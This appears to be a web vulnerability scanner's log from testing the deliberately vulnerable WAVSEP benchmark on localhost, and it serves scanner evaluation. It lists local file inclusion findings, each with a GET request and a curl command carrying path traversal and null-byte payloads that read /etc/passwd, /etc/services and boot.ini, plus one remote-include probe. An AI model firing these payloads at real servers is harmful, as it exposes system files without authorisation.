Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2Fcontent.ini%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=http%3A%2F%2Fwww.google.fr%2F%3F"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%2Fetc%2Fservices%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case59-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
